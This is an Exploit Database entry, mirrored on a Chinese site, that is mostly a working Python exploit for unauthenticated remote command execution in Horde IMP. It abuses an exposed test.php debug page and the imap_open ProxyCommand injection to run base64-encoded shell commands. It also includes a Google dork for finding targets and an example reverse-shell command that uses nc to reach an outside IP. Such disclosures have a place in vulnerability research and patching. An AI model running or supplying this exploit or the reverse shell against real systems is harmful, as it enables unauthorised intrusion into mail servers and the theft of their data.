Horde Imp – ‘imap_open’ Remote Command Execution

• Exploit Database
• 11 阅读

• 作者： Paolo Serracino, Pietro Minniti, Damiano Proietti
  日期： 2019-01-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46136/

• # Exploit Title: Horde Imp Unauthenticated Remote Command Execution 
  # Google Dork: inurl:/imp/login.php
  # Date: 10/01/2019
  # Exploit Author: Paolo Serracino - Pietro Minniti - Damiano Proietti
  # Vendor Homepage: https://www.horde.org/apps/imp/
  # Software Link: https://www.horde.org/download/imp
  # Version: All IMP versions
  # Tested on: Debian/Ubuntu
  
  import requests
  import sys
  import base64 
  import random
  import string 
  
  '''
   --------------------------------------------------------------------------------------------
  | Paolo Serracino - Pietro Minniti - Damiano Proietti - @OmnitechIT |
  | Horde Imp Unauthenticated Command Execution via imap_open function in exposed debug page |
   --------------------------------------------------------------------------------------------
  
  Horde Imp, an application that comes with the Horde GroupWare/Webmail suite exposes an unauthenticated debug page with a form 
  that permits IMAP requests to arbitrary hosts. The page is at http://horde_path/imp/test.php and should be deleted after installation.
  Leveraging the CVE 2018-19518 and no input sanitization is possible to execute shell commands.
  Tested on Debian/Ubuntu.
  '''
  
  def check(target):
  
   try:
  res_check = requests.get(target)
  if 'PHP Mail Server Support Test' in res_check.text and 'PHP Major Version: 5.' in res_check.text:
   print("[+] Target is most likely vulnerable")
   return True
  else:
   print("[-] Target doesn't look vulnerable") 
   sys.exit()
   
   except requests.exceptions.RequestException as e:
  print("[-] Connection Issue") 
   
  
  
  def exploit(target,cmd):
  
   cmd= base64.b64encode(cmd)
   payload1 = random.choice(string.ascii_letters) 
   new_headers = ({'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',
   'Referer':target,
   'Cookie':'Horde=klstwo9u52kw7iqy4i22i0iok1;auth_key=klstwo9u52kw7iqy4i22i0iok1;imp_key=klstwo9u52kw7iqy4i22i0iok1;' 
  })
  
   res = requests.post(target,headers=new_headers,data=[('server',payload1 + ' -oProxyCommand=echo$IFS$()' + cmd + '|base64$IFS$()-d|sh}'), #in order to avoid url encoding by requests
  ('port','143'),
  ('user','a'),
  ('passwd','a'),
  ('server_type','imap'),
  ('f_submit','Submit')
  ])
   print('[+] Sent!')
  
  
  if(len(sys.argv)) < 3:
   
   print("[+] First argument is the path of target's Horde test.php and second the payload as a shell command")
   print('[+] Enclose shell commands between double quotes')
   print('[+] example python horde_imap_cmd.py http://127.0.0.1/horde/imp/test.php "mknod /tmp/bk p; nc 192.168.1.17 443 0</tmp/bk | /bin/bash 1>/tmp/bk"')
   sys.exit()
  
  target = sys.argv[1] #+ '/imp/test.php'
  cmd = sys.argv[2]
  
  if check(target):
   exploit(target,cmd)